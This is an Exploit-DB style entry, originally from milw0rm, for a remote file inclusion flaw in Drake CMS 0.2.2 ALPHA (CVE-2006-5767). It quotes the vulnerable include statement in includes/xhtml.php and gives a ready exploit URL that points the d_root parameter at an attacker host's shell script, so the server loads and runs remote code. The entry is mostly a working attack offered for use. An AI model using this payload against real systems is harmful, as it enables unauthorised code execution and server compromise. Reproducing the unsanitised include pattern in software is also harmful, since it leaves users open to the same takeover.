Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion

Author: GregStar
type: webapps
platform: php
port: 
date_added: 2006-11-03 
date_updated: 2016-09-14 
verified: 1 
codes: OSVDB-31245;CVE-2006-5767 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdrake-v0.2.2.846a.zip

**********************************************************************************************************

			                Coding 4 Fun (c4f.pl)

**********************************************************************************************************

* Drake CMS v0.2.2 ALPHA rev.846 (http://drakecms.org) ;

* Class = Remote File Inclusion ;

* Download = https://sourceforge.net/project/showfiles.php?group_id=166901&package_id=192077&release_id=420102 ;

* Found by = GregStar (gregstar[at]c4f[dot]pl) ;

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code in "includes/xhtml.php" :

 	include $d_root.'classes/kses.php';

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:

	http://[target]/[path]/includes/xhtml.php?d_root=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------

Gr33tz:  sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,RFL,d3m0n,java,reyw,kw@ch and for all friends.

**************************************************************************************************************

# milw0rm.com [2006-11-04]